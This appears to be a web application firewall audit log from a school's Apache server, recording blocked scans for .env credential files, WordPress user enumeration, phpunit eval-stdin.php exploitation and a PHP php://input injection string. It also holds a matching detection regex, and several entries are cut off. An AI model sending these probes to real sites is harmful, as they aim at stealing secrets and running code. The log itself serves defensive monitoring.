Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749445741989456 810 (- - -) Stopwatch2: 1749445741989456 810; combined=331, p1=291, p2=0, p3=0, p4=0, p5=39, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02777e1c-Z-- --6e5b763e-A-- [09/Jun/2025:14:21:46 +0700] aEaLimIgvuFVSPOFHr8KrAAAAEU 103.236.140.4 50590 103.236.140.4 8181 --6e5b763e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 156.239.203.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.239.203.74 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6e5b763e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e5b763e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749453706218890 2996 (- - -) Stopwatch2: 1749453706218890 2996; combined=1307, p1=437, p2=839, p3=0, p4=0, p5=30, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e5b763e-Z-- --564d4751-A-- [09/Jun/2025:15:04:56 +0700] aEaVqGIgvuFVSPOFHr8KygAAAE0 103.236.140.4 50954 103.236.140.4 8181 --564d4751-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.180.153.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.180.153.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --564d4751-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --564d4751-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749456296136149 3545 (- - -) Stopwatch2: 1749456296136149 3545; combined=1475, p1=491, p2=945, p3=0, p4=0, p5=39, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --564d4751-Z-- --f961d53e-A-- [09/Jun/2025:15:15:39 +0700] aEaYK2IgvuFVSPOFHr8LuQAAAFA 103.236.140.4 54002 103.236.140.4 8181 --f961d53e-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.234.156.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.234.156.214 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f961d53e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f961d53e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749456939464775 1161 (- - -) Stopwatch2: 1749456939464775 1161; combined=448, p1=411, p2=0, p3=0, p4=0, p5=37, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f961d53e-Z-- --8b4d107d-A-- [09/Jun/2025:15:15:40 +0700] aEaYLE2r5gN9oSasJQyolAAAAMk 103.236.140.4 54034 103.236.140.4 8181 --8b4d107d-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.234.156.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.234.156.214 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --8b4d107d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b4d107d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749456940587193 729 (- - -) Stopwatch2: 1749456940587193 729; combined=312, p1=281, p2=0, p3=0, p4=0, p5=31, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b4d107d-Z-- --e923bc70-A-- [09/Jun/2025:15:15:41 +0700] aEaYLa6OGK25CtJ36rMSnAAAABg 103.236.140.4 54070 103.236.140.4 8181 --e923bc70-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.234.156.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.234.156.214 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --e923bc70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e923bc70-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749456941988876 885 (- - -) Stopwatch2: 1749456941988876 885; combined=305, p1=272, p2=0, p3=0, p4=0, p5=32, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e923bc70-Z-- --efc7472c-A-- [09/Jun/2025:15:16:42 +0700] aEaYak2r5gN9oSasJQyo7gAAANY 103.236.140.4 55730 103.236.140.4 8181 --efc7472c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.1.2; Redmi 4X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --efc7472c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --efc7472c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749457002044016 824 (- - -) Stopwatch2: 1749457002044016 824; combined=353, p1=313, p2=0, p3=0, p4=0, p5=40, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --efc7472c-Z-- --cb95cf73-A-- [09/Jun/2025:15:49:55 +0700] aEagM66OGK25CtJ36rMgfwAAAA0 103.236.140.4 48816 103.236.140.4 8181 --cb95cf73-B-- GET /core/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G955U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --cb95cf73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb95cf73-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749458995562204 770 (- - -) Stopwatch2: 1749458995562204 770; combined=341, p1=299, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb95cf73-Z-- --a5113762-A-- [09/Jun/2025:16:28:13 +0700] aEapLa6OGK25CtJ36rMsuQAAAAk 103.236.140.4 38246 103.236.140.4 8181 --a5113762-B-- GET /production/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3178.0 Safari/537.36 Accept-Charset: utf-8 --a5113762-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5113762-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749461293425152 829 (- - -) Stopwatch2: 1749461293425152 829; combined=387, p1=345, p2=0, p3=0, p4=0, p5=41, sr=131, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5113762-Z-- --f5c2d60f-A-- [09/Jun/2025:16:49:26 +0700] aEauJq6OGK25CtJ36rMvBwAAAA0 103.236.140.4 44100 103.236.140.4 8181 --f5c2d60f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.92.221.46 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.92.221.46 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --f5c2d60f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5c2d60f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749462566441454 906 (- - -) Stopwatch2: 1749462566441454 906; combined=387, p1=327, p2=0, p3=0, p4=0, p5=60, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5c2d60f-Z-- --2c258e50-A-- [09/Jun/2025:17:41:12 +0700] aEa6SGIgvuFVSPOFHr8jwQAAAEE 103.236.140.4 45918 103.236.140.4 8181 --2c258e50-B-- GET /.env.zip HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.59.160.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.59.160.164 X-Forwarded-Proto: http Connection: close user-agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-ca; GT-P5113 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Accept: */* --2c258e50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c258e50-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749465672247669 887 (- - -) Stopwatch2: 1749465672247669 887; combined=340, p1=280, p2=0, p3=0, p4=0, p5=60, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c258e50-Z-- --fce57a73-A-- [09/Jun/2025:17:41:14 +0700] aEa6Sq6OGK25CtJ36rMwLAAAABU 103.236.140.4 45920 103.236.140.4 8181 --fce57a73-B-- GET /.env.rar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.59.160.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.59.160.164 X-Forwarded-Proto: http Connection: close user-agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-ca; GT-P5113 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Accept: */* --fce57a73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fce57a73-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749465674224994 779 (- - -) Stopwatch2: 1749465674224994 779; combined=309, p1=272, p2=0, p3=0, p4=0, p5=37, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fce57a73-Z-- --4116b623-A-- [09/Jun/2025:17:41:15 +0700] aEa6S66OGK25CtJ36rMwLQAAAA4 103.236.140.4 45922 103.236.140.4 8181 --4116b623-B-- GET /.env.tar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.59.160.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.59.160.164 X-Forwarded-Proto: http Connection: close user-agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-ca; GT-P5113 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Accept: */* --4116b623-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4116b623-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749465675501848 916 (- - -) Stopwatch2: 1749465675501848 916; combined=353, p1=313, p2=0, p3=0, p4=0, p5=40, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4116b623-Z-- --991b1c30-A-- [09/Jun/2025:17:41:16 +0700] aEa6TK6OGK25CtJ36rMwLgAAAAE 103.236.140.4 45924 103.236.140.4 8181 --991b1c30-B-- GET /.env.tar.gz HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.59.160.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.59.160.164 X-Forwarded-Proto: http Connection: close user-agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-ca; GT-P5113 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Accept: */* --991b1c30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --991b1c30-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749465676416719 658 (- - -) Stopwatch2: 1749465676416719 658; combined=256, p1=224, p2=0, p3=0, p4=0, p5=31, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --991b1c30-Z-- --e599fc2d-A-- [09/Jun/2025:18:58:47 +0700] aEbMd66OGK25CtJ36rMyTQAAABI 103.236.140.4 49958 103.236.140.4 8181 --e599fc2d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.206.132.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.206.132.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e599fc2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e599fc2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749470327491538 2215 (- - -) Stopwatch2: 1749470327491538 2215; combined=1067, p1=337, p2=703, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e599fc2d-Z-- --2def6524-A-- [09/Jun/2025:19:08:27 +0700] aEbOu66OGK25CtJ36rMylwAAAAo 103.236.140.4 50382 103.236.140.4 8181 --2def6524-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 157.66.54.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 157.66.54.166 X-Forwarded-Proto: http Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --2def6524-C-- --2def6524-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2def6524-E-- --2def6524-H-- Message: Access denied with code 403 (phase 2). String match " --739de614-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --739de614-E-- --739de614-H-- Message: Access denied with code 403 (phase 2). String match " --8ec2960c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ec2960c-E-- --8ec2960c-H-- Message: Access denied with code 403 (phase 2). String match " --4f01bb6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f01bb6b-H-- Message: Access denied with code 403 (phase 2). String match " --4995050d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4995050d-E-- --4995050d-H-- Message: Access denied with code 403 (phase 2). String match " --0b377729-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b377729-E-- --0b377729-H-- Message: Access denied with code 403 (phase 2). String match " --2e360623-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e360623-H-- Message: Access denied with code 403 (phase 2). String match " --693b8d0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --693b8d0b-E-- --693b8d0b-H-- Message: Access denied with code 403 (phase 2). String match " --ecc52818-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecc52818-E-- --ecc52818-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749487036746943 5216 (- - -) Stopwatch2: 1749487036746943 5216; combined=3251, p1=522, p2=2690, p3=0, p4=0, p5=39, sr=78, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecc52818-Z-- --bee2df57-A-- [09/Jun/2025:23:46:12 +0700] aEcP1BMDIkuu7kMwm-AlgAAAAJE 103.236.140.4 39764 103.236.140.4 8181 --bee2df57-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; PIC-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --bee2df57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bee2df57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749487572577549 817 (- - -) Stopwatch2: 1749487572577549 817; combined=333, p1=294, p2=0, p3=0, p4=0, p5=39, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bee2df57-Z-- --64fb4b20-A-- [10/Jun/2025:00:18:52 +0700] aEcXfE2r5gN9oSasJQzN4AAAANM 103.236.140.4 40072 103.236.140.4 8181 --64fb4b20-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; VTR-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --64fb4b20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64fb4b20-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749489532607442 778 (- - -) Stopwatch2: 1749489532607442 778; combined=324, p1=286, p2=0, p3=0, p4=0, p5=38, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64fb4b20-Z-- --88107340-A-- 